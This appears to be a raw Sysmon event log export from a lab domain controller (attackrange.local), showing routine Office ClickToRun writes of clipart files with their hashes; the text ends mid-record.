Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0099145.JPGMD5=68532E607C4A9694FA85FC0C1E384124,SHA256=BE8843FE4D8BC1B0C09B5FDFF04E4F212BCC4F2FB95F0C6ACA1A9CCB5CDC47CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0098497.WMFMD5=2E79E8868FFE5D8DEFC5C625325400F8,SHA256=F39628AAD1548FB9C1780A4E4E272F1F248A8162570382952B19B147FB32E4BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0093905.WMFMD5=6BC0C63F51D573BF1579C82A32FEB208,SHA256=B350D09668898AEE423D29F5AD680518569786B622A62E46DC03DB82D7818190,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0090783.WMFMD5=0CF80446962C72CD26C8FFB8E31819CE,SHA256=1FBBB6B84F6A4F8255CC541CD4A1B2A55ED567458B4C13D5B6E1A4A0595780A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0090781.WMFMD5=A8A8DD08D8F60B4A0A2619C44A40CF55,SHA256=FE7E99BA0B9D6E5455200539AF5CE69FD78A960D40CD673FB7F2BDDE6ADEDA47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0090779.WMFMD5=7C643075969B02656579777359A0E282,SHA256=2E4E952F19E30EE2A4067359959B187E91BBCEF4CD1A485B6F93764E19DEA1D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0090777.WMFMD5=5C1AC24D4455FAA950DAFF89621C6018,SHA256=FF991F15EE5D3DD92706E4848FB19B527F532EABD519DF8D92F6FCDF7F6EC45D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0090390.WMFMD5=DEBEAD8934D3CD92000C54C31CAF222C,SHA256=BD180857ECB88B15ECF04A51FA9531D18927DF0E614AE7166753B18CC39C7839,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0090149.WMFMD5=FB3904AACFD898298E6F7B5F8474C9CA,SHA256=81DDA09593B1FE2CE42F836A4434F322B61BFCEA3A538060008B440238011DA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0090089.WMFMD5=62DF021BA01DA185237CD197CA3FACC9,SHA256=094FB3D7B8651DFC5AB9A92D0701F39C424743429E78E5FC539EB59A1D4D93A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0090087.WMFMD5=34E26DE80B8A08EB760FD87B9A9A5D0B,SHA256=B2B51D06108893E9E6AE0792C08C84B5FB2AC3CC5F245A8FD837C0AAE1AC3A6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0090027.WMFMD5=E86999E9F83ACCD020B25B73BEB986CB,SHA256=CF1C296C7344A20810444636B8919B418149C2BF8532F29CDDF9CCC6ABA9480E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0089992.WMFMD5=8A8702D4B8A265F691770611E06A5192,SHA256=C3C2D2C1891EAA7DD7104E2CB66F7F9E256F506144CB2B8E2F892E549F586C09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0089945.WMFMD5=D0F4FF3B8CF1709B44E940ECF0674D6E,SHA256=9072E65827CC06C0BEF5309CAA4FA688DA7DE6289E21069460D52A8FBD531ADA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0086478.WMFMD5=45CAA592B2801E10727F41C49C0DDEF8,SHA256=F86EFE833F0630B0B1CAE55989C2BA08F13843681AFDD822B130187E69C064B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0086432.WMFMD5=25FB32AC3BB286095F230844445C3E69,SHA256=2BABFD2C1716C162434AF6C147F5B0754CBF98BE110A6CAE531486FE3B3218E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.330{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0086428.WMFMD5=2143DF0081E0ADF971CA7EC4154A1EAB,SHA256=3642AEEFB6C01C11AB9CB713EE0B67CFA7967E4B9CD47510ACD55CD21BB7191B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0086426.WMFMD5=EB97B22589C6FDA232FBFA1B85AC1073,SHA256=D6E55EC3CF055B2F9356CCA83B6596A783C1C374E02D134FFD840D8440D30644,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0086424.WMFMD5=F2362A659A7F84BC309571D4822BCAE8,SHA256=1E83D9F9B9FAA324D5942C5125A01BEEF57FF9DB0B9BEF22D62717D670AC367A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0086420.WMFMD5=603BBEC007ED7935742F3DA7355CF533,SHA256=6DB82246CD4DF8519A293DC5D18604E8CAB274C36645FCEFD83068512C61CD69,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0086384.WMFMD5=C2644A54BB147CC26C65F106590EB766,SHA256=6DBB169AAECBE982B6D0C082F2001127087720BCE3741CF6921DE383021D85C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\J0075478.GIFMD5=62A85E60306AA561226FA1EE64FC7C51,SHA256=5BCC9C1106F4BE08F6B1A4D88F64D42FB80E536C65A023B1B084EDB6372D3CC6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\INDST_01.MIDMD5=46B9C43766298DE9A91BB7B5C81B09F0,SHA256=7C3D56B1096A83FEFDAB543B15DA8371070CE61849557638281B4B2B07BF23E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00957_.WMFMD5=6204A2325F6E15136EAED76C5C594499,SHA256=E39454601F30002EB27323CDE6DDE8FB0B9FFB4EC2F95871B21ED5F77AB4277A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00956_.WMFMD5=5BACBF7DE88981F080A6F93670C9E678,SHA256=B215B973B288999DCBE967692516112708EA5BC37D4257221EF72A10A565DE58,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00919_.WMFMD5=8495DDE5F8BF138DE9E9B14D22C4F6F8,SHA256=ECF20A5EBF0049AF922C2D78ED9F5CB0B91C3823F9DCF7201B7C6391F1A9E1DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00915_.WMFMD5=72648692F97450FED7ACBCE8F99DE66C,SHA256=4CB7A21868AEAFFDBB36730CCF4A61E428807A2367CFEE4A8135638776D35936,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00557_.WMFMD5=D8A4373004FC89BEFB4125460ACC4849,SHA256=EEB7E25A9DB6A173201DFB8F59CECBA78659A265142B4A9F314CE2755ED90DA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00351_.WMFMD5=3C6AC9861A4F8EBA74719B607ED90B68,SHA256=E2AF294FB697C62551C98A6FA288DEAB06046E1FFC7C6D6DA7933B94178586C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00346_.WMFMD5=7FE72DD43AB8BE546364AA689F20CED7,SHA256=D060455879707473EF3D4B59819E8592BE82FCD0EF101D87E54F866F8AC7A9D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00343_.WMFMD5=9FD1BC4AEC0D3534CDC2FB1AEE642995,SHA256=EFAF51497AA08AF95716669E9880E44A86BF17B42BF081C24A93E206A2BA536B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00233_.WMFMD5=6F155B1C035DAB700BDC1BB0B545C5BB,SHA256=456446217D22299E0F344C72129A867A0B72C86E68DEF46E42444DE4AE6F62C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00204_.WMFMD5=031548BF33839399BF41A994F7D27E95,SHA256=EF27BA4600346A85C3B57CAB1A37F95FA27EDCFB020BB9E00DAD50F3FB7B935A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00177_.WMFMD5=FFAA994D6EE02067C68212EA595CEE09,SHA256=FA5C5966CAAF51364AD22DE205ED2BDAA4A5C8C425D96690A80C6E8C1B1F8933,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00118_.WMFMD5=E83EF96DCF491BEDB1A874A5DD0815E7,SHA256=22E7F6F4FA13DD67B461F79A13EAD05FA323B62069A156D46A36A0F8376A3B98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\IN00046_.WMFMD5=9000A41E9CF6DA1072B7D4231305AE56,SHA256=80C1940E08EDE2CBFF3462011BA9B774B54EC8D2163F28AFFFF008E57E2035C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HTECH_01.MIDMD5=3483406B7942AC84D30871364E8BFBC9,SHA256=35EAE2096A24BB21B5084452D0DDF41BAA454F397DFCDB81506BC43D5AB4D1CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HM00426_.WMFMD5=662F3A0358EAC57E5F11AB5C0B94CFD6,SHA256=365E16385B1BA8E9FAF753D5D8E02CD6DEAA693BFF76926F6FA17D14DF40D654,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HM00172_.WMFMD5=603F6143EB26506E05EA58472107B970,SHA256=8BE02F2926BFD9A7F54FA2DC8A5EAF28AEE9EAF200A9908F61742ACB566205CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HM00116_.WMFMD5=A08723BE74E6B8C792CA894AA5372CFF,SHA256=C87C3462AFB0109DC75DA4536427100E892BC2279905E86E80452B81948A9A10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HM00114_.WMFMD5=381D07F6ABCA8AE10110A3AEEC506EE1,SHA256=A7D87FBE788CD580A4DE5BE69A84A6F9EEDDE08D4E0C3F5181ED330478D9A268,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HM00005_.WMFMD5=F55F654BDDE6B909780D24AA48D1784B,SHA256=AE6135660312464D59AB1FCB2F380A094D24FEB8601935A64F4C1A77079F1151,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH02313_.WMFMD5=76B923FDE5FA80F28ABE2BB7396EB5E1,SHA256=995854282F7559386FDC6492173708D63DB480E49CDD677C0303285DD73B69C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH02312_.WMFMD5=46C9AFDC44A8ED5E72BB7FFA3B7DE9E6,SHA256=E37EE32EDA1B5262AFC1D912D4A17E29F1B702614C4C6A319547BEE362A92964,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\HH02298_.WMFMD5=7A8EE9DF73F630875B56D02FF7F42B1A,SHA256=DBF073164AC365070659411C1138C7289E38A82B1BC9D4AC3480907C5327652D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:08.299{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 